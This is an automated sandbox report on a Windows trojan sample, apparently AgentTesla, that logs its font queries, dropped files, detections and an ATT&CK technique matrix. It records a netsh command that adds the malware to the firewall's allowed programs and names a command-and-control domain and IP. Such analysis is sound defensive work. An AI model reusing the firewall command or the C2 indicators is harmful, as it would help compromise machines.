        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\ESjy0irMIn.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\netsh.exe | Queries volume information: C:\ | VolumeInformation
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_000184C7 GetLocalTime,swprintf, | 2_2_000184C7
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00018E9C GetTimeZoneInformation,GetSystemTime,SystemTimeToTzSpecificLocalTime, | 2_2_00018E9C
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00028FF5 GetVersion,GetModuleHandleW,GetProcAddress, | 2_2_00028FF5

        Lowering of HIPS / PFW / Operating System Security Settings

        Source: C:\ProgramData\essam@sasa2023.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLE
        Source: essam@sasa2023.exe, 00000003.00000002.4193957410.0000000000F10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Program Files\AVG\Antivirus\AVGUI.exe
        Source: essam@sasa2023.exe, 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 00000003.00000002.4199118899.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 00000003.00000002.4199118899.000000000317F000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -|k/.C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
        Source: essam@sasa2023.exe, 00000003.00000002.4193957410.0000000000F10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\C:\Program Files (x86)\AVG\Antivirus\AVGUI.exe
        Source: essam@sasa2023.exe, 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 00000003.00000002.4199118899.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 00000003.00000002.4199118899.000000000317F000.00000004.00000800.00020000.00000000.sdmp, essam@sasa2023.exe, 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -|k)(C:\Program Files\AVG\Antivirus\AVGUI.exe

        Stealing of Sensitive Information

        Source: Yara match | File source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: essam@sasa2023.exe PID: 7172, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: essam@sasa2023.exe PID: 7648, type: MEMORYSTR

        Remote Access Functionality

        Source: Yara match | File source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: Process Memory Space: essam@sasa2023.exe PID: 7172, type: MEMORYSTR
        Source: Yara match | File source: Process Memory Space: essam@sasa2023.exe PID: 7648, type: MEMORYSTR

        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
        Execution: 11 Scripting; 14 Native API; 3 Command and Scripting Interpreter; 2 Service Execution; Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
        Persistence: 1 DLL Side-Loading; 11 Windows Service; 2 Registry Run Keys / Startup Folder; Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
        Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 11 Windows Service; 11 Process Injection; 2 Registry Run Keys / Startup Folder; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
        Defense Evasion: 211 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 11 Scripting; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection
        Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
        Discovery: 2 System Time Discovery; 4 File and Directory Discovery; 18 System Information Discovery; 131 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 2 Process Discovery; 1 Application Window Discovery; Network Service Scanning; System Network Connections Discovery; Process Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
        Collection: 11 Archive Collected Data; 1 Input Capture; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
        Command and Control: 1 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 21 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
        Impact: 1 System Shutdown/Reboot; Device Lockout; Delete Device Data; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        Behavior Graph
        Behavior Graph ID: 1336857
        Sample: ESjy0irMIn.exe
        Startdate: 03/11/2023
        Architecture: WINDOWS
        Score: 100

        Top-level DNS/IP: bmw2022.ddns.net
        Top-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 9 other signatures

        Process tree (numbers in parentheses are the counts shown next to each node in the graph):
        • ESjy0irMIn.exe (6)
          • dropped: C:\ProgramData\essam@sasa2023.exe (PE32)
          • dropped: C:\ProgramData\dotNetFx40_Client_setup.exe (PE32)
          • essam@sasa2023.exe (3 5)
            • DNS/IP: bmw2022.ddns.net 156.196.162.149, ports 49734, 49738, 49741, TE-ASTE-ASEG Egypt
            • dropped: C:\Users\user\AppData\Roaming\...39ame.js (ASCII)
            • signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Drops script or batch files to the startup folder; 3 other signatures
            • netsh.exe (2)
              • conhost.exe
          • dotNetFx40_Client_setup.exe (136)
            • dropped: C:\b53dd3b256ba71dad061693a386e\sqmapi.dll (PE32)
            • dropped: C:\...\SetupUtility.exe (PE32)
            • dropped: C:\b53dd3b256ba71dad061693a386e\SetupUi.dll (PE32)
            • dropped: 27 other files (none is malicious)
            • Setup.exe (4 9)
              • WINWORD.EXE
                • splwow64.exe
              • WINWORD.EXE
        • wscript.exe (1 1)
          • signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
          • essam@sasa2023.exe
          • essam@sasa2023.exe

        | Source | Detection | Scanner | Label | Link |
        |---|---|---|---|---|
        | ESjy0irMIn.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.Razy | |
        | ESjy0irMIn.exe | 100% | Avira | HEUR/AGEN.1305400 | |
        | ESjy0irMIn.exe | 100% | Joe Sandbox ML | | |
        | Source | Detection | Scanner | Label | Link |
        |---|---|---|---|---|
        | C:\ProgramData\essam@sasa2023.exe | 100% | Avira | HEUR/AGEN.1305400 | |
        | C:\ProgramData\essam@sasa2023.exe | 100% | Joe Sandbox ML | | |
        | C:\ProgramData\dotNetFx40_Client_setup.exe | 0% | ReversingLabs | | |
        | C:\ProgramData\essam@sasa2023.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |
